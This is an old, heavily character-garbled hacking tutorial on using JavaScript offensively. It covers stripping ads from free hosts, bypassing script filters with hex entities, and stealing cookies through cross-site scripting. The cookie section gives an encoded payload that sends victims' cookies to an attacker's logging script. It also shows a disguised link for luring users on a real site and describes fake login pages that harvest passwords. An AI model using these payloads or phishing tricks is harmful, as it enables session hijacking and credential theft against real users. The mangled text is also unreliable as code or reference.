Hacking With Javascript

By b0iler
Hacking With Javascript ??? Written by b0iler for http://b0iler.eyeonsecurity.net
-things to come: eample of stealing info from users !anti-virus programs an" tro#ans$% story of
ciru cookie stealing from acanium% &he'ull(s #avascript eploits% an" the about:// eploit.? )ince
so many people *ere asking *hen this tutorial *oul" come out + "eci"e" to finally put it up.? +("
appriecate" some fee"back.? ,lames *ithout a reason are not *elcome. &his tutorial is not
completely finishe".. an" probably never *ill be :!
-i"ea: cross site scriptting by opening a ne* page in a frame an" then *ritting to form fiel"s or
someho* in#ecting #avascript. -r someho* *rite the html to the top or bottom.
+ntro
Javascript is use" as a client si"e scripting language% meaning that your bro*ser is *hat
interprets it.? +t is use" on *ebpages an" is secure !for the most part$ since it cannot touch any
files on your har" "rive !besi"es cookies$.? +t also cannot rea"/*rite any files on the server.?
.no*ing #avascript can help you in both creating "ynamic *ebpages% meaning *ebpages that
change% an" hacking.? ,irst + *ill start *ith the basic #avascript synta% then + *ill list a fe* sites
*here you can learn more% an" then + *ill list a fe* *ays you can use #avascript to hack.
&here are a fe* benifits of kno*ing #avascript.? ,or starters% it is really the only !fully supporte"$
language that you can use on a *ebsite making it a very popular language on the net.? +t is very
easy to learn an" shares common synta *ith many other languages. /n" it is completely open
source% if you fin" something you like "one in #avascript you can simply vie* the source of the
page an" figure out ho* it(s "one.? &he reason + first got into #avascript *as because back before
+ got into hacking + *ante" to make my o*n *ebpage.? + learne" H&01 very 2uickly an" sa*
3ynamic H&01 !3H&01$ mentione" in a fe* tutorials.? + then venture" into the lan" of #avascript
making simple scripts an" usful features to my site.
+t *as only after + *as pretty goo" *ith #avascript an" got into hacking that + slo*ly sa* it(s
potential to be use" milisously.? 0any #avascript techni2ues are pretty simple an" involve tricking
the user into "oing something.? /lmost pure social engineering *ith a bit of help from #avascript.?
/fter using simple #avascript tricks to fake login pages for *ebbase" email + thought about other
*ays #avascript coul" be use" to ai" my hacking% + stu"ie" it on an" off for aroun" a year.? )ome
of these techni2ues are use" by millions of people% some + came up *ith an are purely
theorectical.? + hope you *ill reali4e ho* much #avascript can ai" a hacker.
5. Basic )ynta
6. 'laces &o 1earn 0ore /"vance" Javascript
7. Banner Busting 8 .illing ,rames
9. :etting 'ast )cripts &hat ,ilter Javascript
;. )tealing <ookies
=. )tealing ,orms
>. :aining +nfo -n ?sers
@. )tories -f Javascript Hacks
A. <onclusion
5. Basic )ynta
&he basics of #avascript are fairly easy if you have programme" anything before% although
#avascript is not #ava% if you kno* #ava you shoul" have no problems learning it.? )ame for any
other programming language% as most share the same basics as #avascript uses.? &his tutorial
might not be for the complete ne*bie.? + *oul" like to be able to "o a tutorial like that% but + "on(t
have the time or patience to *rite one.? &o begin if you "on(t kno* html you must learn it firstB
Javascript starts *ith the tag Cscript languageDE#avascriptEF an" en"s *ith C/scriptF? /nything
bet*een these t*o tags is interprete" as #avascript by the bro*ser.? Gemember thisB? <ause a
fe* hacks use the fact that if you use Cscript typeDE#avascriptEF an" "on(t finish it all the html on
the page un"erneath that is ignore".? Hou can also use Cscript typeDEtet/#avascriptEF an"
CC/scriptF.. either *ay is fine.? + *oul" also like to mention that many scripts have CB-- right after
the Cscript typeDEtet/#avascriptEF tag an" //--F right before the C/scriptF tag% this is because they
*oul" like to make it compatible *ith other bro*sers that "o not support #avascript.? /gain% either
*ay is fine% but + *ill be using the CB-- an" //--F because that is ho* + learne" to script an" + got
use" to putting it in.
Javascript uses the same basic elements as other programming languages.. )uch as variables%
flo* control% an" functions.? &he only "ifference is that #avascript is a lot more simplifie"% so
anyone *ith some programming eperience can learn #avascript very 2uickly.? &he har"est part
of scripting #avascript is to get it to *ork in all bro*sers.? + *ill no* go over the basics of
variables:
to "efine a variable as a number you "o: var name D 5I
to "efine a variable as a string you "o: var name D (value(I
/ variable is basically the same in all programming languages.? + might also point out that
#avascript "oes not support pointers.? Jo structs to make your o*n variables either.? -nly
variable types are "efine" by (var(.? &his can be a har" thing to un"erstan" at first% but #avascript
is much like <KK in ho* it han"les variables an" strings.? / string is a group of characters% like:
(*or"(% *hich is a string.? When you see something like "ocument.*rite!something$I? it *ill try to
print *hatever is in the variable something.? +f you "o "ocument.*rite!(something($I? or
"ocument.*rite!EsomethingE$I? it *ill print the string (something(.? Jo* that you got the variables
"o*n lets see ho* to use arithmetic operators.? &his *ill make 6 variables an" a"" them together
to make a ne* *or":
Cscript typeDEtet/#avascriptEF
CB--
var name D (b0iler(I
var a"#ective D (o*ns(I
"ocument.*rite!nameKa"#ective$I
//--F
C/scriptF
first *e "efine the variable (name( as b0iler% then + "efine (a"#ective( as o*ns.? &hen the
"ocument.*rite!$ function *rites it to the page as (name(K(a"#ective( or b0ilero*ns.? +f *e *ante"
a space *e coul" have "i" "ocument.*rite!nameK( (Ka"#ective$I
Lscaping characters - &his is an important concept in programming% an" etremely important in
secure programming for other languages.. #avascript "oesn(t really nee" to *orry about secure
programming practice since there is nothing that can be gaine" on the server from eploitting
#avascript.? )o *hat is EescapingE?? +t is putting a M in front of certain characters% such as ( an" E.?
+f *e *ante" to print out:
b0iler(s *ebsite
We coul"n(t "o:
"ocument.*rite!(b0iler(s *ebsite($I
because the bro*ser *oul" rea" b0iler an" see the ( then stop the string.? We nee" to a"" a M
before the ( so that the bro*ser kno*s to print ( an" not interpret it as the en"ing ( of the string.?
)o here is ho* *e coul" print it:
"ocument.*rite!(b0ilerM(s *ebsite($I
&here are t*o types of comments in #avascript.? // *hich only lasts till the en" of the line% an" /N
*hich goes as many as far as possible until it reaches N/ +(ll "emonstrate:
Cscript typeDEtet/#avascriptEF
CB--
"ocument.*rite!(this *ill sho* up($I // this *ill not% even "ocument.*rite!(blah($I *on(t
/N "ocument.*rite!(this also *ill not sho* up($I
this *on(t ether. "ocument.*rite!(or this($I
it is all in the comments.. *hich aren(t ren"ere" by the bro*ser N/
//--F
C/scriptF
&he only thing that script *ill "o is print Ethis *ill sho* upE.? Lverything else is in comments *hich
are not ren"ere" as #avascript by the bro*ser.
,lo* <ontrol is basically changing *hat the program "oes "epen"ing on *hether something is
true or not.? /gain% if you have ha" any previous programming eperience this is ol" stuff.? Hou
can "o this a fe* "ifferent *ays "ifferent *ays.? &he simplest is the if-then-else statements.?
Here is an eample:
Cscript typeDEtet/#avascriptEF
CB--
var name D (b0iler(I
if !name DD (b0iler($O "ocument.*rite!(b0iler is a really cool guyB($I P
else O "ocument.*rite!(b0iler can not "efine variables *orth a hootB($I P
//--F
C/scriptF
1ets break this "o*n step by step.? ,irst + create the variable (name( an" "efine it as b0iler.?
&hen + check if (name( is e2ual to Eb0ilerE if it is then + *rite (b0iler is a really cool guyB(% else !if
name isn(t e2ual to b0iler$ it prints (b0iler can not "efine variables *orth a hootB(.? Hou *ill notice
that + put O an" P aroun" the actions after the if an" else statements.? Hou "o this so that
#avascript kno*s ho* much to "o *hen it is true.? When + say true think of it this *ay:
if !name DD (b0iler($
as
if the variable name is e2ual to (b0iler(
if the statement name DD (b0iler( is false !name "oes not e2ual (b0iler($ then *hatever is in the OP
!curely brackets$ is skippe".
We no* run into relational an" e2uality operators.? &he relational operators are as follo*s:
F - :reater than% if the left is greater than the right the statement is true.
C - 1ess than% if the left is lesser than the right the statement is true.
FD - :reater than or e2ual to.? +f the left is greater than or e2ual to the right it is true.
CD - 1ess than or e2ual to.? +f the left is lesser than or e2ual to the right it is true.
)o lets run through a 2uick eample of this% in this eample the variable (lo*er( is set to 5 an" the
variable (higher( is set to 50.? +f lo*er is less than higher then *e a"" 50 to lo*er% other*ise *e
messe" up assigning the variables !or *ith the if statement$.
Cscript typeDEtet/#avascriptEF
CB--
var lo*er D 5I
var higher D 50I
if !lo*er C higher$ O lo*er D lo*er K 50I P ? //*e coul" have use" lo*er KD lo*erI
"ocument.*rite!(lo*er shoul" be greater than higher.. or else + messe" up.E$I
"ocument.*rite!(lo*er:(Klo*erK( an" higher:(Khigher$I
//--F
C/scriptF
an" no* the e2uality operators% you have alrea"y seen one of them in an eample: if !name DD
(b0iler($ the e2uality operators are DD for Ee2ual toE an" BD for Enot e2ual toE.? 0ake sure you
al*ays put t*o e2ual signs !DD$ because if you put only one !D$ then it *ill not check for e2uality.?
&his is a common mistake that is often overlooke".
Jo* *e *ill get into loops% loops continue the statements in bet*een the curly brackets OP until
they are no longer true. &here are 6 main types of loops + *ill cover: *hile an" for loops.? Here is
an eample of a *hile loop:
Cscript typeDEtet/#avascriptEF
CB--
var name D (b0iler(I
var namenumber D 5I
*hile !namenumber C ;$ O
? ? name D name K nameI ? // coul" have use": name KD nameI
? ? "ocument.*rite!name$I
? ? namenumber D namenumber K 5I
P
//--F
C/scriptF
,irst (name( is set to b0iler% then (namenumber( is set to 5.? Here is *here *e hit the loop% it is a
*hile loop. What happens is *hile namenumber is less than ; it "oes the follo*ing 7 comman"s
insi"e the brackets OP: name D name K nameI ? "ocument.*rite!name$I ? namenumber D
namenumber K 5I ? &he first statement "oubles the length of (name( by a""ing itself on to itself.?
&he secon" statement prints (name(.? /n" the thir" statement increases (namenumber( by 5.? )o
since? (namenumber( goes up 5 each time through the loop% the loop *ill go through 9 times.?
/fter the 9th time (namenumber( *ill be ;% so the statement namenumber C ; *ill no longer be
true.
1et me 2uickly go over some short cuts to stan"ar" math operators% these shortcuts are:
variableKKI ? // a""s 5 to variable.
variable--I ? // subtracts 5 from variable.
variableKD somethingI ? // a""s something to variable.? 0ake sure to use (s if it is a string like:
variableKD (string(I
variable-D 7I ? // subtracts 7 from variable
variableND 6I ? // multiples variable by 6.
Jet loop is the for loop.? &his loop is uni2ue in that it !"efines a variableI then checks if a
con"ition is trueI an" finally changes a variable after each time through the loop$.? ,or the
eample lets say you *ant to "o the same thing as above.? &his is ho* you *oul" "o it *ith a for
loop:
Cscript typeDEtet/#avascriptEF
CB--
var name D (b0iler(I
for !var namenumber D 5I namenumber C ;I namenumberKK$ O
? ? name KD nameI ? // this is the same as before: name D name K nameI
? ? "ocument.*rite!name$I
P
//--F
C/scriptF
,irst the variable name is "efine"% then it starts the for loop.? +t assigns 5 to namenumber% then
checks if namenumber is less than ; every time through the loop% an" it increases namenumber
by 5 every time through the loop !variablenameKK means increase the variable by 5$.? &he net 6
lines are the same as *ith the *hile loop.? But since the for loop han"les the "eclaration of
namenumber an" the increase every time through the loop it makes it simpler for the scripter an"
easier to keep track of for people trying to rea" the co"e.? Hou can use a *hile loop if you *ant% it
is all up to the scripter(s preference.
1ets go over that for loop one more time% #ust for clarity.? for !"one only the first timeI loop
continues *hile this is trueI "one after every time through the loop$
&hat(s it for learning #avascript% this *as really basic an" pretty much covere" things that are
constant in most languages.? ,or #avascript specific gui"es check out the net section of the
tutorial. &his section *as only to give the user enough info to un"erstan" the rest of the tutorial.? +
*ish + coul" go over more% but there are *ay better tutorials for a"vance" #avascript then one +
coul" ever *rite.
6. 'laces &o 1earn 0ore /"vance" Javascript
+ *ill #ust provi"e a list of tutorials an" sites *ith more a"vance" #avascript.? +f you *ish to learn
#avascript an" be able to *rite your o*n you *ill have to look at other people(s scripts for
eamples an" rea" a fe* more tutorials.? + #ust *ent over the very basics so you *oul"n(t be lost.
http://hot*ire".lycos.com/*ebmonkey/programming/#avascript/tutorials/tutorial6.html - goo"
eamples% not really a"vance".. prolly a me"ium level #avascript tutorial.
http://***.*eb"evelopers#ournal.com/articles/#sevents6/#sevents6.html - / #avascript tutorial on
event han"les. ,airly a"vance".
http://***.htmlguru.com - a classic site% go to the tutorials section an" learn a lot of a"vance"
#avascript ma"e easy.
http://server5.*sabstract.com/#avatutors - :oes over some specific aspects to a"vance"
#avascript *ork.? ?seful in many situations.
http://***.pageresource.com/#script/in"e=.htm - &he a"vance" string han"ling an" the forms
tutorials are goo"% + *oul" suggest rea"ing them if you *ish to get more into #avascripting.
<oolner"(s Javascript Gesource - / nice list of al the #avascript operators% statements% ob#ects..
although it might be alittle ol" + still use it all the time.
+f you *ant to create your o*n #avascripts for yoursite be *arne".? Javascripts are very limite" in
po*er% but can be the solution to many simple problems.? Hou *ill have to spen" a fe* *eeks
learning more a"vance" #avascript in or"er to make anything really useful.? <reating that
a*some 3H&01 !3ynamic H&01$ feels really goo" I$? 3ynamic H&01 is pretty much #avascript
that interacts *ith the user% css% an" layers - C"ivF% CspanF% an" ClayerF.
Here is some links to goo" "ynamic html sites:
&he 3ynamic 3uo% <ross bro*ser "ynamic html tutorial - :oes over things step by step.
&aylor(s "ynamic H&01 tutorial - &hat nice *ebmonkey style that everyone loves.
<urious Lye 3H&01 tutorial - &his *ill really get you going making cross bro*ser 3ynamic
H&01.
+ntro to 3H&01 - 0ight be nice if you aren(t as html an" #avascript kno*le"gable as most 3H&01
beginners.
:oo" luck *ith your a"venture into #avascript D$
7. Banner Busting 8 .illing ,rames
+ call it banner busting% it is *hen you use #avascript !or other tags$ that aren(t ren"ere" by the
bro*ser the same as normal html tags to get aroun" a popup or banner that free sites
automatically put on your page.? &he basic i"ea of this is to have a tag that isn(t ren"ere" as html
right before the html the site a""s on their banner so that user(s bro*sers "o not see the banner.?
&here is only really one key thing you nee" to fin" out in or"er to kill that banner. &his is *hat tag
the site uses as a EkeyE.? What + mean by this is *hat tag "oes the banner they a"" come before
or after?? &ry putting up a page *ith #ust:
ChtmlF
CB-- blah --F
Cbo"yF
CB-- blah --F
tet
CB-- blah --F
C/bo"yF
CB-- blah --F
C/htmlF
no* uploa" that page an" vie* it in a bro*ser.? Qie* the source of the page an" fin" *here the
site a""e" it(s banner html.? +f it came after the ChtmlF an" before the Cbo"yF then you nee" to
see if it came before or after the CB-- blah --F *hich is in bet*een those.? +f it is before% then it is
the ChtmlF tag that is the key tag *hich the site a""s it(s banner after.? +f it is un"er the CB-- blah
--F than you kno* it puts it after the Cbo"yF tag.
)o no* that *e kno* *here the site a""s it(s banner html *hat "o *e "o to stop it?? We try to
make a EfakeE tag an" hopefully the site a""s it(s banner html to the fake one instea".? &hen *e
use #avascript to print the real one.? We can "o a fe* things% here is the list:
the basic CnoscriptF - this use" to *ork% as most banners or popups start *ith some #avascript%
but no* free sites have gotten smart an" automaticly a"" a C/noscriptF to stop it.
CnoscriptF
CkeytagF ? -this keytag is the "ecoy. Before/after this tag is *here the banner *oul" be.
C/noscriptF
CkeytagF ? -this keytag is the real one.
CscriptF % CstyleF % CmlF - these are a fe* eamples of tags that *ill make the a"" on html an"
#avascript of the site(s banner not ren"er by the bro*ser.? since it is not in the synta of css% ml
or #avascript !it is html$ user(s bro*sers *ill #ust ignore it.
CstyleF
CkeytagF ? -this keytag is the "ecoy. Before/after this tag is *here the banner *oul" be.
C/styleF
CkeytagF ? -this keytag is the real one.
printing tags *ith #avascript - this one *as thought up by acec** an" *orks really *ell% if you are
having problems *hen you put the real keytag then try using #avascript so the site "oesn(t even
see it as the keytag.? you get #avascript to print the tags one letter at a time.
Cscript typeDE#avascriptEF
CB--
"ocument.*rite!(C(K(k(K(e(K(y(K(t(K(a(K(g(K(F($I
//--F
C/scriptF
CstyleF
CkeytagF ? -this keytag is the "ecoy. Before/after this tag is *here the banner *oul" be.
C/styleF
+f all *orke" out you shoul" have a page *ith no annoying popups or flashing banners.? +f not +
guess you *ill have to play aroun" a little an" figure it out for yourself.? )ince every free host
uses "ifferent keytags an" metho"s of a""ing it(s banner + can(t go over them all one by one.
+ "eci"e" to go over a real eample of a free site that a"" popup a"s or banners to every page
you have.? +(ll be using angelfire since + hate them an" because that(s the one + picke" out of my
lucky hat.? Just remember that sites can change the *ay they a"" banners anytime they feel like%
so this metho" might not *ork the same *ay as + am sho*ing.? 3oing this also breaks the &-)
!&erms -f )ervice$ *ith your host% so you might get your site taken "o*n *ithout any *arning.?
/l*ays have complete backups of your site on your har""rive% espechially if you have a hacking
site or are breaking the &-).
angelfire
------------------------
begin
------------------------
ChtmlF
Chea"F
CtitleFtestingC/titleF
C/hea"F
Cbo"yF
CB-- Beginning of /ngelfire /" <o"e +nsertion --F
C/noscriptF
Cscript languageDEJava)criptEF
CB--
!this is *here the angelfire a" script *oul" be.$
//--F
C/scriptF
CB-- Ln" of /ngelfire /" <o"e +nsertion --F
CpF rest of test pageC/pF
C/bo"yF
C/htmlF
------------------------
en"
------------------------
as you can see angelfire puts their a" right after the Cbo"yF tag.? /ll they are using to protect us
from getting ri" of the a" is a C/noscriptF so.. *e can put something like this to "efeat the a":
CstyleF
Cbo"yF
C/styleF
Cbo"yF
)o angelfire(s server *ill a"" the #avascript for thier a"vertisment after the first Cbo"yF they see.?
&hat *ill put the a" after CstyleFCbo"yF an" before C/styleF.? &his means that user(s bro*sers
*ill think that Cbo"yF an" the angelfires a" is css !casca"ing style sheet$.. *hich is the CstyleF
tag.? )ince #avascript an" html cannot be in css the bro*ser ignores it.? We then put the real
Cbo"yF after this an" continue *ith our site.
/bout a month after + *rote this + came up *ith an i"ea of ho* to complete remove the
a"vertisments sites put on your pages.? + am not 500R sure it *ill *ork% but the basic i"ea is to
have a cgi script open all the .html pages in your "irectory% remove the a"% an" *rite the html
back to the .html files.? ,e* things might affect ho* *ell this *orks.? ,irst if the script that a""s
the a" to the .html files is a cron #ob% but + "oubt this% since it *oul" put heavy strain on the
system to search an" *rite to all those files.? )econ"% the script might be ran *henever a .html
file is e"itte"% + am hoping that it is only ran *hen a file is create" or a file is uploa"e".? +(ll test
this out some"ay% if you *ant this script come bother me on irc about it an" + might finish it D$
.illing ,rames
Jo* +(ll go over ho* to kill frames.? &he reason you *oul" nee" this script is to hack name4ero%
nbci% an" other companies *hich put your page in a frame.? .illing a frame means to get ri" of it
so that your site is the one filling the *hole *in"o*.
&here is one soli" *ay *hich has al*ays *orke" for "oing this.? Jot only *ill it bust out of
companies frames.. But if some lamer is leeching your site by using frames this *ill stop them.?
&he script is as follo*s:
Cscript typeDE#avascriptEF
if !self BD top$ top.location.replace!self.location$I
//--F
C/scriptF
What this script "oes is checks if the current page is not the top !first$ frame% if it isn(t then it puts
itself as the top frame% "eleting the other frame from the bro*ser *in"o*.? 'retty han"y trick D$
9. :etting 'ast )cripts &hat ,ilter Javascript
1ets say *e are entering info to a guestbook.? &his *oul" be put on the main page of the
guestbook. /n" *henever anyone visite" that page *e *ant them to be sent to
http://***.lamein"ustries.org.? We *oul" enter this in the guestbook:
Cscript typeDE#avascriptEF
"ocument.location D http://***.lamein"ustries.orgI
//--F
C/scriptF
)ometimes *hen you *ant to use #avascript there is some form of filtering going on that stops the
CscriptF tag from being ren"ere" as usual. ,or those of you *ho kno* perl + *ill "emonstrate.
S1ine from a perl script that filters input for the CscriptF tagT
Uinput D s/Cscript/8ltIscript/igI
Uinput is *hat you submitte" to the perl script% *hat it is "oing is looking for Cscript in your input
an" replacing it *ith 8ltIscript.? )o ho* "o you get aroun" this?? We can use the he value of
any or all characters in Cscript typeDE#avascriptEF? the only characters you cannot "o this for are
the C an" the F because they *oul" not be ren"ere" by the bro*ser if you "i". )o no* *e enter
something like this into the guestbook:
C8V55;Icript typeDE#avascriptEF
"ocument.location D http://***.lamein"ustries.orgI
//--F
C/scriptF
Ho* "i" + kno* *hat the he value of (s( *as?? + #ust checke" an ascii chart an" a""e" 8 before
it an" I after it.? Hou can use this in the url of your bro*ser as *ell% #ust put R before the
number.? / chart ascii chart is available at
***.lamein"ustries.org/tutorials/tutorials/*tfWisWhe.shtml or man ascii if you run Nni.
&here are a fe* other situations *here #avascript can be useful.? +f you can get aroun" the filter
on a users email you can use your spoofing email skills to sen" an email from someone they
trust.? +f they open it you can have the email re"irect them to a page *hich says something like
Esession time" out% please login in againE an" have that form submitte" to a cgi script that logs
it.? &his *orks for a small percentage of people% but it is *orth a shot sometimes.
:etting by #avascript filters can lea" to you getting cookies for such things as forums% shopping
carts% sites% an" re"irecting users to the site of your choice.? /ny*here there is input that is
"isplaye" on a page *hich other people may visit !or you can make them visit$ there is an
opportunity to use #avascript to steal information.? +nfact #ust to"ay as + am *riting this it *as
foun" that lycos an" other search engines are vulnerable to #avascript in *ebsite(s "escriptions
an" names% rea" the slash"ot story for more info.? &his coul" lea" to 500R clicks for any search
your site turns up on I$.
Here is a cert a"visory concerning insertion of scripts !#avascript% vbscript% etc..$ inputte" into
scripts:
http://***.cert.org/a"visories/</-6000-06.html
up"ate: there has been a ne* a"visory for hotmail an" other sites *hich filter #avascript.? &he
problem lays in css an" the use of the ClinkF tag.? When the follo*ing co"e is use" the linke"
#avascript *ill be eecute"% making it possible to steal cookies% info% or re"irect users to a fake
login page.
C1+J. GL1D)&H1L)HLL& &H'LDEtet/#avascriptE )G<DEscript.#sEF
put that in the bo"y% preferably as the first thing.? -f course hotmail patche" it "ays after it *as
reporte"% but it stan" to sho* that hotmail is not 500R secure an" there *ill still be *ays in the
future to get scriptting eecute".? /lso other *eb base" email% guestbook% message boar"s% etc..
might be vulnerable to this.? Hou can use ol" hotmail eploits on many other scripts that allo*
input an" print them to a .html file.? + foun" this vulnerability in a script that cyberarmy.com ran for
their *eb base" mail% + #ust "i" a C8V55;Icript typeDE#ava8V55;IcriptEF an" re"irecte" the user to
a fake login page.? When they logge" in *ith their user an" pass*or" it sent them to a script that
*rote their info to a "atabase an" then logge" them into the *eb base" email script again.? &he
script *as ma"e by solutionscripts% an" cyberarmy is no longer vulnerable.
/lso note that normal tet fiel" input is not the only *ay to insert "ata into a script.? Hi""en fiel"s
an" environment variables are also sometimes vulnerable.? )ome scripts *ill filter all the tet
fiel"s% but *ill not filter the hi""en fiel"s% this allo*s you to insert #avascript or other nasty things.?
+ *on(t go to much into that since it *oul" re2uire a *hole nother tutorial an" because *ritting
#avascript isn(t the first thing you *oul" try to eploit *ith that.? Lnvironment variables that you
can eploit are usually referrer or user-agent% since those ten" to be the only ones ever *ritten to
a file% they are also the least filtere" input in my eperience.? +t(s much easier to fin" *ays to
insert #avascript if you can get ahol" of the source of the script.? &here are t*o easy *ays to "o
this% the first is to see if the script is open source% then go "o*nloa" an" revie* the co"e for
holes.? &he other is to look for other scripts/eploits that allo* you to vie* the source of other
scripts.? )o "o some research for other eploits in other scripts !or the *ebserver itself$.
;. )tealing <ookies
note: to "o this you(ll nee" a little bit of a"vance" #avascript kno*le"ge% an" some perl/php/asp
!or other server si"e language$.
)tealing cookies can be a "angerous problem for many sites.? +t all "epen"s on ho* the site sets
up it(s security.? +f a site #ust uses cookies to i"entify users than it coul" be vulnerable.? +f you
nee" to login then it is almost useless to try an" steal cookies.? ?nless of course the username
an" pass*or"s are store" in the cookie an" is not encrypte". )ometimes you are allo*e" access
*ithout logging in.? We *ill pick on http://ne*or"er.bo.sk since they stol" some 1+ tutorials% even
though they are not vuln to this because you must login to their site an" the user pass*or" is not
in the cookie.? !1ets see if they steal a tutorial *hich eplains ho* to eploit a hole in one of their
scripts I$? ?Ho* *e *ill be eploiting this bug is simple.? 1uckily cube left us a vulnerable script
on the site to play *ith. &he script is http://ne*or"er.bo.sk/bo.php7?
pr#Dne*or"er8ne*onlyD58gfDne*or"er8ttD*hat(sKne*.
What is vuln about this script?? +t "oesn(t escape the inputte" characters that are printe" to the
page. + tol" you escaping characters is important.? &he script instea" relies on a simple CpreF tag
to stop #avascript.? )o the first thing *e must "o is test an" see *hat character(s !if any$ are left
unescape" for us to use.? /fter a check for these characters: ( E I X C F / an" R *e fin" that he
"oes escape ( an" E.? +f he "i"n(t *e coul" eploit the php script itself an" have total control over
the site.? + *ill get to a little trick in a secon" *here *e can get #avascript to print out ( an" E.? But
for no* *e must stop that CpreF tag.? )o *e en" it *ith a C/preF then insert any #avascript *e
*oul" like.
+n the first paragraph + sai" that #avascript is mostly secure% because it cannot rea" or *rite any
files off a users har" "rive besi"es cookies.? Here *e *ill use #avascript to rea" the user(s cookie
for ne*or"er? an" then use #avascript to sen" them to a cgi script *here *e log their cookie to a
tt file.? /fter this *e check the log from the cgi script an" save the cookie *here our bro*ser
keeps them.? -r *e can get the username an" pass*or" from the cookie an" login to the site
!ne*or"er "oesn(t keep the user(s pass*or" in the cookie$.
)o no* to print the #avascript that *ill steal the cookie.? What *e are "oing is using the script that
prints out unescape" characters to the page as if it *as #avascript that *as really on that
*ebsite.? )o *e can vie* an" e"it user cookies.? &here are t*o main problems *e must
overcome.? ,irst *e nee" to print a string *ithout using ( an" E since the .php script on ne*or"er
"oes escape those characters.? Ho* *e "o this is by using #avascript *hich "oesn(t nee" ( or E
an" prints out any character.? &his is one *ay to "o it:
Cscript typeDtet/#avascriptF var u D )tring.from<har<o"e!000=@$I u R6BD
)tring.from<har<o"e!000>9$I u R6BD )tring.from<har<o"e!000>9$I u R6BD
)tring.from<har<o"e!000>0$I u R6BD )tring.from<har<o"e!0007/$I u R6BD
)tring.from<har<o"e!0006,$I u R6BD )tring.from<har<o"e!0006,$I u R6BD
)tring.from<har<o"e!000>7$I u R6BD )tring.from<har<o"e!000=A$I u R6BD
)tring.from<har<o"e!000>9$I u R6BD )tring.from<har<o"e!000=;$I u R6BD
)tring.from<har<o"e!0006L$I u R6BD )tring.from<har<o"e!000=7$I u R6BD
)tring.from<har<o"e!000=,$I u R6BD )tring.from<har<o"e!000=3$I u R6BD
)tring.from<har<o"e!0006,$I u R6BD )tring.from<har<o"e!000=5$I u R6BD
)tring.from<har<o"e!0006L$I u R6BD )tring.from<har<o"e!000=7$I u R6BD
)tring.from<har<o"e!000=>$I u R6BD )tring.from<har<o"e!000=A$I u R6BD
)tring.from<har<o"e!0007,$I u R6BD "ocument.cookieI "ocument.location.replace!u$I //--F
C/scriptF
We nee" to use R6B instea" of K because K becomes a space *hen you go to the script.? &here
is probably an easier *ay of "oing this besi"es using from<har<o"e% but + coul"n(t think of any
D$? &he 000=@ is ascii for h.? >9 is t.. !Hou can get an ascii chart from
http://***.elf2rin.com/"ocs/hakref/asciiWtable.html $:
=@Dh >9Dt >9Dt >0Dp 7/D: 6,D/ 6,D/ >7Ds =ADi >9Dt =;De 6LD. =7Dc =,Do =3Dm 6,D/ =5Da
6LD. =7Dc =>Dg =ADi 7,D? +n other *or"s it makes the var u e2ual to the string
http://site.com/a.cgi?
/ll right% so *e got a string in a variable *ithout using ( or E.? var u D (http://site.com/a.cgi?(I *oul"
be the same thing if the script "i"n(t filter for ( an" E.? )o no* that *e got the string going *hat
shoul" *e "o?? Well *hat *e are trying to "o is get the cookie in a string an" then sen" them to
a cgi script that logs *hat(s in the cookie.? "ocument.cookie is the cookie for that site.? +f there is
more than one cookie then you have to use a little trickery.? try this page for learning ho* to
han"le multiple cookies. Jo* *e nee" to a"" the cookie to the en" of the url.? )o:
u R6BD "ocument.cookieI
WhamB -ur var u is no*: http://site.com/a.cgi?userWsWcookie !but userWsWcookie is actually the
value in their cookie$.? )o no* *e make #avascript re"irect them to that url.
"ocument.location.replace!u$I
&his *ill sen" them to our var u% *here a.cgi *ill be a cgi script that #ust logs *hatever is inputte"
to it into a "atabase.? /nother *ay to log their cookie *oul" be to put something like:
Cimg srcDEhttp://site.com/some"ir/!"ocument.cookie$EF But since this script filters ( an" E it *oul"
be a really long url to put from<har<o"e(s for every character.. /lso% you *oul" have to have
access to the logs of the site in or"er to check *hat files *ere re2ueste" from (some"ir( "irectory.
/ll cookie stealing techni2ues re2uire some kin" of script on your *ebsite to log the cookie *hen
it is sent as a url.
-nce you have a user(s cookie there are 6 things it can be use" for.? )ometimes sites put their
username an" pass*or" right in the cookie.? +n this case you can #ust log into the site *ith that.?
)ome other sites #ust simply use a cookie to authenticate users. Jo login re2uire".
&ake for eample ***.geocities.com .. +f you get a 909 error it *ill print out the url:
like this
no* if you have a cookie of a geocities member you can go to ***.geocities.com an" you *ill
automatically be logge" in.? ,rom there you have full control over their account.
But geocities "i" "o something to stop this. &hey have their *ebsite go to
http://geocities.yahoo.com .. )o the cookie for users is actually a yahoo cookie I!? +f you try the
same trick *here you go to a 909 file on yahoo it *on(t print the C an" F characters.? But if you
*ere to fin" a script on yahoo that printe" out C an" F you coul" easily "o this D$? /n" there are
scripts on yahoo.com *hich are vuln to cross site scriptting% a fe* have been reporte" to bugtra2
an" + foun" another one.
)o ho* *oul" you get users to visit these urls?? &ry things like ...
Heah all you re"lite players% check out this hi""en pick% funny as hell: <heck this page outB ? -r
better yet.. 1oa" it in a frame that is 0R large.? &he user *on(t even kno* *hat hit them D$
oh% the source for that re"lite link is:
Ca hrefDEhttp://***.re"lite.org/signup/signup6.php?usernameDCscript typeDtet/#avascriptFvar u
D )tring.from<har<o"e!000=@$Iu R6BD )tring.from<har<o"e!000>9$Iu R6BD
)tring.from<har<o"e!000>9$Iu R6BD )tring.from<har<o"e!000>0$Iu R6BD
)tring.from<har<o"e!0007/$Iu R6BD )tring.from<har<o"e!0006,$Iu R6BD
)tring.from<har<o"e!0006,$Iu R6BD )tring.from<har<o"e!000=6$Iu R6BD
)tring.from<har<o"e!00070$Iu R6BD )tring.from<har<o"e!000=>$Iu R6BD
)tring.from<har<o"e!0006L$Iu R6BD )tring.from<har<o"e!000=,$Iu R6BD
)tring.from<har<o"e!000>6$Iu R6BD )tring.from<har<o"e!000=>$Iu R6BD
)tring.from<har<o"e!0006,$Iu R6BD )tring.from<har<o"e!000=5$Iu R6BD
)tring.from<har<o"e!0006L$Iu R6BD )tring.from<har<o"e!000>0$Iu R6BD
)tring.from<har<o"e!000=@$Iu R6BD )tring.from<har<o"e!000>0$Iu R6BD
)tring.from<har<o"e!0007,$Iu R6BD "ocument.cookieI"ocument.location.replace!u$IC/scriptFE
on0ouse-verDE*in"o*.statusD(http://***.re"lite.com/signup6.php?boobs-an"-guy(Ireturn trueE
on0ouse-utDE*in"o*.statusD((Ireturn trueEF <heck this page outB C/aF
notice the:
on0ouse-verDE*in"o*.statusD(http://***.re"lite.com/signup6.php?boobs-an"-guy(Ireturn trueE
an"
on0ouse-utDE*in"o*.statusD((Ireturn trueE
